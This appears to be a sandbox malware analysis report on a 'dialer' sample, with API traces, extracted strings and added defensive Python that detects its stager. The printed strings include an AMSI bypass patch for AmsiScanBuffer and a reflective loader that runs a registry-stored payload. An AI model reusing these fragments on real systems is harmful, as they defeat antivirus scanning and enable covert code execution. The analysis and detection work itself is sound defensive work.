                                                          • Associated: 00000032.00000002.3449005210.000002D016603000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000032.00000002.3449145667.000002D016609000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_50_2_2d0165e0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                          • String ID: pid_
                                                          • API String ID: 517849248-4147670505
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000032.00000002.3448686152.000002D0165E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_50_2_2d0165e0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: FileWrite$ConsoleErrorLastOutput
                                                          • String ID:
                                                          • API String ID: 2718003287-0
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000032.00000002.3448686152.000002D0165E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_50_2_2d0165e0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$Free
                                                          • String ID:
                                                          • API String ID: 3168794593-0
                                                          APIs
                                                          • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,000002D0165F2D9B), ref: 000002D0165F2ECC
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,000002D0165F2D9B), ref: 000002D0165F2F57
                                                          Memory Dump Source
                                                          • Source File: 00000032.00000002.3448686152.000002D0165E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_50_2_2d0165e0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: ConsoleErrorLastMode
                                                          • String ID:
                                                          • API String ID: 953036326-0
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000032.00000002.3448686152.000002D0165E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_50_2_2d0165e0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                          • String ID:
                                                          • API String ID: 2933794660-0
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000032.00000002.3448686152.000002D0165E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_50_2_2d0165e0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: FileType
                                                          • String ID: \\.\pipe\
                                                          • API String ID: 3081899298-91387939
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000032.00000003.2231390678.000002D016580000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002D016580000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_50_3_2d016580000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: CallTranslator
                                                          • String ID: MOC$RCC
                                                          • API String ID: 3163161869-2084237596
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000032.00000002.3448686152.000002D0165E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_50_2_2d0165e0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: FileType
                                                          • String ID: \\.\pipe\
                                                          • API String ID: 3081899298-91387939
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000032.00000003.2231390678.000002D016580000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002D016580000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_50_3_2d016580000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: _log10_special
                                                          • String ID: dll
                                                          • API String ID: 3812965864-1037284150
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000032.00000002.3448686152.000002D0165E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_50_2_2d0165e0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: ErrorFileLastWrite
                                                          • String ID: U
                                                          • API String ID: 442123175-4171548499
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000032.00000002.3448686152.000002D0165E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_50_2_2d0165e0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFileHeaderRaise
                                                          • String ID: csm
                                                          • API String ID: 2573137834-1018135373
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000032.00000003.2231390678.000002D016580000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002D016580000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_50_3_2d016580000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: __std_exception_copy
                                                          • String ID: `vector constructor iterator'$ctor closure'
                                                          • API String ID: 592178966-3792692944
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000032.00000003.2231390678.000002D016580000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002D016580000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_50_3_2d016580000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: __std_exception_copy
                                                          • String ID: ctor closure'$destructor iterator'
                                                          • API String ID: 592178966-595914035
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000032.00000003.2231390678.000002D016580000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002D016580000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_50_3_2d016580000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: std::bad_alloc::bad_alloc
                                                          • String ID: `scalar deleting destructor'$rFeaturePresent
                                                          • API String ID: 1875163511-1689945142
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000032.00000002.3448686152.000002D0165E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_50_2_2d0165e0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$AllocFree
                                                          • String ID:
                                                          • API String ID: 756756679-0
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000032.00000002.3448686152.000002D0165E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_50_2_2d0165e0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Heap$AllocProcess
                                                          • String ID:
                                                          • API String ID: 1617791916-0
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000032.00000002.3448686152.000002D0165E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                          • Associated: 00000032.00000002.3448572183.000002D0165E0000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000032.00000002.3448840592.000002D0165F6000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000032.00000002.3448901031.000002D016601000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000032.00000002.3449005210.000002D016603000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000032.00000002.3449145667.000002D016609000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_50_2_2d0165e0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Heap$AllocProcess
                                                          • String ID:
                                                          • API String ID: 1617791916-0
                                                          • Opcode ID: 5675c379a8d9e89708cd85a835e518bb04a23da85e3639b53f95be9f51753b7f
                                                          • Instruction ID: 301ce8787f551722ef8a87cd9efdd85ec7c5a1b74a9ec493aa3a44b9c06d7179
                                                          • Opcode Fuzzy Hash: 5675c379a8d9e89708cd85a835e518bb04a23da85e3639b53f95be9f51753b7f
                                                          • Instruction Fuzzy Hash: D0E0E571611AA086E7089BA2DC4C759B7A1FB88B16F888065C90907321EF388C998A20

                                                          Execution Graph

                                                          Execution Coverage:75.2%
                                                          Dynamic/Decrypted Code Coverage:0%
                                                          Signature Coverage:0%
                                                          Total number of Nodes:96
                                                          Total number of Limit Nodes:1
                                                          execution_graph 190 140001970 193 140001984 FindResourceExA 190->193 194 140001979 ExitProcess 193->194 195 1400019ae SizeofResource 193->195 195->194 196 1400019c3 LoadResource 195->196 196->194 197 1400019d7 LockResource RegOpenKeyExW 196->197 197->194 198 140001a0e RegSetValueExW 197->198 198->194 199 140001a34 198->199 209 140001a7c GetProcessHeap HeapAlloc StrCpyW 199->209 203 140001a48 204 1400017ec 9 API calls 203->204 205 140001a57 204->205 252 14000117c 7 API calls 205->252 207 140001a62 207->194 262 140001614 SysAllocString SysAllocString CoInitializeEx 207->262 272 14000114c GetModuleHandleA 209->272 212 140001b05 StrCatW StrCatW 275 140001c9c GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 212->275 213 140001ad5 StrCatW StrCatW StrCatW 213->212 218 140001c0c 6 API calls 219 140001b4b 218->219 220 140001c0c 6 API calls 219->220 221 140001b5a 220->221 222 140001c0c 6 API calls 221->222 223 140001b69 222->223 224 140001c0c 6 API calls 223->224 225 140001b78 224->225 226 140001c0c 6 API calls 225->226 227 140001b87 226->227 228 140001c0c 6 API calls 227->228 229 140001b96 228->229 230 140001c0c 6 API calls 229->230 231 140001ba5 230->231 232 140001c0c 6 API calls 231->232 233 140001bb4 232->233 234 140001c0c 6 API calls 233->234 235 140001bc3 234->235 236 140001c0c 6 API calls 235->236 237 140001bd2 236->237 238 140001c0c 6 API calls 237->238 239 140001be1 238->239 240 140001c0c 6 API calls 239->240 241 140001bf0 240->241 242 140001c0c 6 API calls 241->242 243 140001a39 242->243 244 1400017ec SysAllocString SysAllocString CoInitializeEx 243->244 245 140001948 SysFreeString SysFreeString 244->245 246 14000182d CoInitializeSecurity 244->246 245->203 247 140001875 CoCreateInstance 246->247 248 140001869 246->248 249 140001942 CoUninitialize 247->249 250 1400018a4 VariantInit 247->250 248->247 248->249 249->245 251 1400018fa 250->251 251->249 253 14000120e CoInitializeSecurity 252->253 254 1400015c0 6 
API calls 252->254 255 140001256 CoCreateInstance 253->255 256 14000124a 253->256 254->207 257 1400015ba CoUninitialize 255->257 258 140001287 VariantInit 255->258 256->255 256->257 257->254 260 1400012de 258->260 259 140001537 259->257 260->259 261 140001489 VariantInit VariantInit VariantInit 260->261 261->259 263 1400017c5 SysFreeString SysFreeString 262->263 264 140001655 CoInitializeSecurity 262->264 263->194 265 140001691 264->265 266 14000169d CoCreateInstance 264->266 265->266 267 1400017bf CoUninitialize 265->267 266->267 268 1400016cc VariantInit 266->268 267->263 269 140001722 268->269 270 14000175c VariantInit 269->270 271 14000178e 269->271 270->271 271->267 273 140001174 272->273 274 140001167 GetProcAddress 272->274 273->212 273->213 274->273 296 140001000 CryptAcquireContextW 275->296 278 140001b2d 289 140001c0c lstrlenW 278->289 279 140001d0d StrStrIW 280 140001f21 6 API calls 279->280 284 140001d2c 279->284 280->278 281 140001d2f StrStrIW StrNCatW StrCatW 282 140001edf StrCatW StrStrIW 281->282 281->284 282->281 283 140001f19 282->283 283->280 284->281 284->282 285 140001ebf StrCatW 284->285 286 140001e82 StrCatW StrNCatW 284->286 288 140001e5a StrCatW StrCatW 284->288 285->284 287 140001eae StrCatW 286->287 287->285 288->287 299 140001070 289->299 291 140001c45 292 140001c49 StrStrIW 291->292 293 140001b3c 291->293 292->293 294 140001c5a 292->294 293->218 295 140001c5d StrStrIW 294->295 295->293 295->295 297 140001039 CryptGenRandom CryptReleaseContext 296->297 298 14000105e 296->298 297->298 298->278 298->279 300 140001000 3 API calls 299->300 301 1400010ea 300->301 301->291 301->301

                                                          Callgraph

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000003F.00000002.2210644819.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 0000003F.00000002.2210602655.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000003F.00000002.2210680875.0000000140002000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000003F.00000002.2210680875.0000000140005000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_63_2_140000000_dialer.jbxd
                                                          Similarity
                                                          • API ID: Crypt$Context$AcquireRandomRelease
                                                          • String ID: Microsoft Base Cryptographic Provider v1.0
                                                          • API String ID: 1815803762-291530887
                                                          • Opcode ID: 0ddbc8895b0669cb0ada80a9b3cf58f5140d61cb55c0be0e277e251b20bcd660
                                                          • Instruction ID: 74dd50a8ca20c1687fe1fd25669d783deb6ceb092ba3a030a89a64c3b25fe62d
                                                          • Opcode Fuzzy Hash: 0ddbc8895b0669cb0ada80a9b3cf58f5140d61cb55c0be0e277e251b20bcd660
                                                          • Instruction Fuzzy Hash: 28F01976700B4082E711CB67E88438AA7A2BBCCB80F498025DB5947729DEB4C956C740

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000003F.00000002.2210644819.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 0000003F.00000002.2210602655.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000003F.00000002.2210680875.0000000140002000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000003F.00000002.2210680875.0000000140005000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_63_2_140000000_dialer.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$Crypt$AllocContextFree$AcquireRandomRelease
                                                          • String ID: '+'$'+[Char]($)+'$0$gfff$gfff
                                                          • API String ID: 3510167801-2888743547
                                                          • Opcode ID: 4c029fa0796edbe0ffa46a87d68ca35ae0ec6b91dd14a689a3b9c7fb106a92b8
                                                          • Instruction ID: 860a95141ccdf47dad873dcb7fdad07428551a8c4d737b9ab5c8568f3082a9eb
                                                          • Opcode Fuzzy Hash: 4c029fa0796edbe0ffa46a87d68ca35ae0ec6b91dd14a689a3b9c7fb106a92b8
                                                          • Instruction Fuzzy Hash: 6A715CB2710B5696EB16DF67FC187D927A6FB89BC8F448025EE0A47B65DE38C509C300

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000003F.00000002.2210644819.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 0000003F.00000002.2210602655.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000003F.00000002.2210680875.0000000140002000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000003F.00000002.2210680875.0000000140005000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_63_2_140000000_dialer.jbxd
                                                          Similarity
                                                          • API ID: Heap$AddressAllocHandleModuleProcProcess
                                                          • String ID: AmsiPtr$AmsiScanBufferPtr$Get-Delegate$GetProcAddress$Kernel32Ptr$LoadLibraryDelegate$LoadLibraryPtr$NativeMethods$OldProtect$ParameterTypes$ReturnType$TypeBuilder$VirtualProtectDelegate$VirtualProtectPtr$[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(`SOFTWARE`).GetValue(`dialerstager`)).EntryPoint.I$[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$AmsiScanBufferPtr,6);$[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualProtectPtr,$VirtualProtectDelegate).Invoke($AmsiScanBuffe$function Local:Get-Delegate{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ParameterTypes,[Parameter(Position=1)][Type]
                                                          • API String ID: 3242894177-3709903795
                                                          • Opcode ID: b1fc34ca39e6db4a99ca0f74ce53aae3f3c4af68fd0d05a2b9d2c7ccdd3fe5d3
                                                          • Instruction ID: 14a767466f4e457cf388ac16d0af6f49bf344e7045f9ae0e12022511aa144a10
                                                          • Opcode Fuzzy Hash: b1fc34ca39e6db4a99ca0f74ce53aae3f3c4af68fd0d05a2b9d2c7ccdd3fe5d3
                                                          • Instruction Fuzzy Hash: 38416BF8284702A1FA1BEF17B8557D52365A78DBC5F846261BE0A473B69EBCC108C394
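The string IDs in this block are the PowerShell stager that the dialer process assembles: a six-byte patch written over AmsiScanBuffer through Marshal::Copy, a `[Reflection.Assembly]::Load` of a blob read back from the `dialerstager` value under the `SOFTWARE` key, and the `'+[Char]($)+'` template it splices into the command so that string signatures do not see the keywords whole. The Python below is an added triage example, not code from the report or from the sample: it reverses the [Char] splicing, decodes the patch stub, and lists the indicators present in a command line. The command it parses is constructed from the fragments above; single-quote quoting and the particular [Char] split points are assumptions, since the report renders the quoting with backticks and shows the template only with a `$` placeholder, and the report's string is cut off after `.EntryPoint.I`, so the sample stops at `.EntryPoint`.

```python
import re
import struct
from typing import Optional

# Constructed sample command, assembled from the string fragments in the report.
# Quoting is assumed to be single quotes; the [Char](N) splits are chosen here
# to mimic the '+[Char]($)+' template the sample uses to split its strings.
SAMPLE_COMMAND = (
    "[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$AmsiScanBufferPtr,6);"
    "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine"
    ".OpenSubkey('SOF'+[Char](84)+'WARE').GetValue('dialer'+[Char](115)+'tager')).EntryPoint"
)

CHAR_SPLICE = re.compile(r"'\+\[Char\]\((\d+)\)\+'")


def deobfuscate_char_concat(text: str) -> str:
    """Undo the '+[Char](N)+' splicing: 'SOF'+[Char](84)+'WARE' becomes 'SOFTWARE'.
    Plain literal joins ('+') left behind by the template are collapsed too."""
    text = CHAR_SPLICE.sub(lambda m: chr(int(m.group(1))), text)
    return text.replace("'+'", "")


def decode_mov_eax_ret(patch: list) -> Optional[dict]:
    """Recognise the stub B8 imm32 C3 (mov eax, imm32 ; ret).  Written over the
    start of AmsiScanBuffer it makes every scan return imm32 as its HRESULT;
    0x80070057 is E_INVALIDARG, so the caller never receives a detection
    result and the script content is allowed to run."""
    if len(patch) != 6 or patch[0] != 0xB8 or patch[5] != 0xC3:
        return None
    hresult = struct.unpack("<I", bytes(patch[1:5]))[0]
    return {"hresult": hresult, "is_e_invalidarg": hresult == 0x80070057}


AMSI_COPY = re.compile(
    r"Marshal\]::Copy\(\[Byte\[\]\]\(([^)]*)\),\s*0,\s*\$AmsiScanBufferPtr,\s*(\d+)\)"
)
LOAD_FROM_REGISTRY = re.compile(
    r"\[Reflection\.Assembly\]::Load\(\[Microsoft\.Win32\.Registry\]::(\w+)"
    r"\.OpenSubkey\('([^']*)'\)\.GetValue\('([^']*)'\)\)"
)


def find_indicators(command: str) -> dict:
    """Return the stager indicators present in a PowerShell command line,
    after the [Char] splicing has been undone."""
    plain = deobfuscate_char_concat(command)
    found = {}
    m = AMSI_COPY.search(plain)
    if m:
        # int(x, 0) accepts both the 0x.. and the bare decimal forms used in the array
        patch = [int(b.strip(), 0) for b in m.group(1).split(",")]
        found["amsi_scanbuffer_patch"] = {
            "bytes": patch,
            "stub": decode_mov_eax_ret(patch),
            "length": int(m.group(2)),
        }
    m = LOAD_FROM_REGISTRY.search(plain)
    if m:
        found["assembly_load_from_registry"] = {
            "hive": m.group(1), "subkey": m.group(2), "value": m.group(3),
        }
    return found


if __name__ == "__main__":
    for name, detail in find_indicators(SAMPLE_COMMAND).items():
        print(name, detail)
```

Running the module on the constructed command reports the AMSI patch with the decoded HRESULT 0x80070057 and the registry-backed assembly load of `LocalMachine\SOFTWARE\dialerstager`; on a benign command line it returns an empty dictionary. The same two patterns apply to any process command line collected from the host, once the [Char] splicing is undone first.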

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000003F.00000002.2210644819.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 0000003F.00000002.2210602655.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000003F.00000002.2210680875.0000000140002000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000003F.00000002.2210680875.0000000140005000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_63_2_140000000_dialer.jbxd
                                                          Similarity
                                                          • API ID: String$AllocFree$InitVariant$Initialize$CreateInstanceSecurityUninitialize
                                                          • String ID: SYSTEM$dialersvc64$powershell
                                                          • API String ID: 3960698109-174983134
                                                          • Opcode ID: a180f732da29d2ef05bbba4c41d26df64929768de65ad4ca02d5ced4f3cbd646
                                                          • Instruction ID: aee36af91c86c83140a7f8fc7c4422115872d8a4c3e6ef38ff6a7da2a4766896
                                                          • Opcode Fuzzy Hash: a180f732da29d2ef05bbba4c41d26df64929768de65ad4ca02d5ced4f3cbd646
                                                          • Instruction Fuzzy Hash: 2DD1DE76604B8586EB11CF6AE8843DE67B1FB88B99F508116EF4E47B68DF39C149C700

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000003F.00000002.2210644819.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 0000003F.00000002.2210602655.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000003F.00000002.2210680875.0000000140002000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000003F.00000002.2210680875.0000000140005000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_63_2_140000000_dialer.jbxd
                                                          Similarity
                                                          • API ID: String$AllocFreeInitInitializeVariant$CreateInstanceSecurityUninitialize
                                                          • String ID: dialersvc64
                                                          • API String ID: 2407135876-3881820561
                                                          • Opcode ID: 3c97e4c5619ef6fd9796c7cadf22d1dacbe7654f614efe6a853fd620db2a3c93
                                                          • Instruction ID: d87eb2bd9d729e9729409dc9478b0812213582aedf91d7913a1da9f61deadf9a
                                                          • Opcode Fuzzy Hash: 3c97e4c5619ef6fd9796c7cadf22d1dacbe7654f614efe6a853fd620db2a3c93
                                                          • Instruction Fuzzy Hash: B6510576704A458AEB11CF7AE8843DD63B1FB88B98F444226EF4E47A29DF38C149C340

                                                          Control-flow Graph

                                                          APIs
                                                          • FindResourceExA.KERNEL32(?,?,?,?,?,0000000140001979), ref: 000000014000199C
                                                          • SizeofResource.KERNEL32(?,?,?,?,?,0000000140001979), ref: 00000001400019B3
                                                          • LoadResource.KERNEL32(?,?,?,?,?,0000000140001979), ref: 00000001400019C8
                                                          • LockResource.KERNEL32(?,?,?,?,?,0000000140001979), ref: 00000001400019DA
                                                          • RegOpenKeyExW.KERNELBASE(?,?,?,?,?,0000000140001979), ref: 0000000140001A04
                                                          • RegSetValueExW.KERNELBASE(?,?,?,?,?,0000000140001979), ref: 0000000140001A2A
                                                            • Part of subcall function 0000000140001A7C: GetProcessHeap.KERNEL32 ref: 0000000140001A85
                                                            • Part of subcall function 0000000140001A7C: HeapAlloc.KERNEL32 ref: 0000000140001A96
                                                            • Part of subcall function 0000000140001A7C: StrCpyW.SHLWAPI ref: 0000000140001AA9
                                                            • Part of subcall function 0000000140001A7C: StrCatW.SHLWAPI ref: 0000000140001ADF
                                                            • Part of subcall function 0000000140001A7C: StrCatW.SHLWAPI ref: 0000000140001AEF
                                                            • Part of subcall function 0000000140001A7C: StrCatW.SHLWAPI ref: 0000000140001AFF
                                                            • Part of subcall function 0000000140001A7C: StrCatW.SHLWAPI ref: 0000000140001B0F
                                                            • Part of subcall function 0000000140001A7C: StrCatW.SHLWAPI ref: 0000000140001B1F
                                                            • Part of subcall function 00000001400017EC: SysAllocString.OLEAUT32 ref: 0000000140001802
                                                            • Part of subcall function 00000001400017EC: SysAllocString.OLEAUT32 ref: 0000000140001812
                                                            • Part of subcall function 00000001400017EC: CoInitializeEx.COMBASE ref: 000000014000181F
                                                            • Part of subcall function 00000001400017EC: CoInitializeSecurity.COMBASE ref: 0000000140001856
                                                            • Part of subcall function 00000001400017EC: CoCreateInstance.COMBASE ref: 0000000140001896
                                                            • Part of subcall function 00000001400017EC: VariantInit.OLEAUT32 ref: 00000001400018A8
                                                            • Part of subcall function 00000001400017EC: CoUninitialize.COMBASE ref: 0000000140001942
                                                            • Part of subcall function 00000001400017EC: SysFreeString.OLEAUT32 ref: 000000014000194B
                                                            • Part of subcall function 00000001400017EC: SysFreeString.OLEAUT32 ref: 0000000140001954
                                                            • Part of subcall function 000000014000117C: SysAllocString.OLEAUT32 ref: 00000001400011A7
                                                            • Part of subcall function 000000014000117C: SysAllocString.OLEAUT32 ref: 00000001400011B7
                                                            • Part of subcall function 000000014000117C: SysAllocString.OLEAUT32 ref: 00000001400011C7
                                                            • Part of subcall function 000000014000117C: SysAllocString.OLEAUT32 ref: 00000001400011D3
                                                            • Part of subcall function 000000014000117C: SysAllocString.OLEAUT32 ref: 00000001400011E3
                                                            • Part of subcall function 000000014000117C: SysAllocString.OLEAUT32 ref: 00000001400011F3
                                                            • Part of subcall function 000000014000117C: CoInitializeEx.COMBASE ref: 0000000140001200
                                                            • Part of subcall function 000000014000117C: CoInitializeSecurity.COMBASE ref: 0000000140001237
                                                            • Part of subcall function 000000014000117C: CoCreateInstance.COMBASE ref: 0000000140001279
                                                            • Part of subcall function 000000014000117C: VariantInit.OLEAUT32 ref: 000000014000128B
                                                            • Part of subcall function 0000000140001614: SysAllocString.OLEAUT32 ref: 000000014000162A
                                                            • Part of subcall function 0000000140001614: SysAllocString.OLEAUT32 ref: 000000014000163A
                                                            • Part of subcall function 0000000140001614: CoInitializeEx.OLE32 ref: 0000000140001647
                                                            • Part of subcall function 0000000140001614: CoInitializeSecurity.COMBASE ref: 000000014000167E
                                                            • Part of subcall function 0000000140001614: CoCreateInstance.COMBASE ref: 00000001400016BE
                                                            • Part of subcall function 0000000140001614: VariantInit.OLEAUT32 ref: 00000001400016D0
                                                            • Part of subcall function 0000000140001614: VariantInit.OLEAUT32 ref: 0000000140001760
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000003F.00000002.2210644819.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 0000003F.00000002.2210602655.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000003F.00000002.2210680875.0000000140002000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000003F.00000002.2210680875.0000000140005000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_63_2_140000000_dialer.jbxd
                                                          Similarity
                                                          • API ID: String$Alloc$Initialize$InitResourceVariant$CreateInstanceSecurity$FreeHeap$FindLoadLockOpenProcessSizeofUninitializeValue
                                                          • String ID: EXE$SOFTWARE$dialerstager$dialersvc32$dialersvc64
                                                          • API String ID: 2204944113-1859800454
                                                          • Opcode ID: 26ae1522833f5bd9fa9188c5454cc5176b5189f098da63ea7365dd9a7c369b54
                                                          • Instruction ID: 1bfe2c02107bc6537b2911a47a34f854c4b6e53c22e939ebebcbb702dcfd335c
                                                          • Opcode Fuzzy Hash: 26ae1522833f5bd9fa9188c5454cc5176b5189f098da63ea7365dd9a7c369b54
                                                          • Instruction Fuzzy Hash: D5213BBA30570152EA26DF63B8143E963A1AB8DBD0F484125FB49477BAEF3CC604C600
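This function locates an embedded resource of type `EXE` (FindResourceExA, SizeofResource, LoadResource, LockResource), opens the `SOFTWARE` key and writes the resource out with RegSetValueExW; the `dialerstager` string alongside is the value name the PowerShell stager later reads back with `Registry.GetValue` and hands to `[Reflection.Assembly]::Load`. The Python below is an added example, not part of the report: given the raw value, it decides whether the blob is a PE image and whether it carries a CLR header, which is what Assembly.Load needs to consume it directly. The in-memory sample PE it builds is constructed for the example; the `read_staged_value` helper and its assumption that the value holds raw bytes are mine, since the report does not show the value type passed to RegSetValueExW.

```python
import struct
from typing import Optional

IMAGE_FILE_MACHINE_AMD64 = 0x8664
IMAGE_FILE_DLL = 0x2000
CLR_DIRECTORY_INDEX = 14  # IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR


def classify_blob(data: bytes) -> dict:
    """Decide what a registry-staged blob is: not a PE at all (encoded or
    wrapped), a native PE, or a managed PE with a CLR header, which is the
    form [Reflection.Assembly]::Load accepts directly."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return {"is_pe": False, "reason": "no MZ header"}
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
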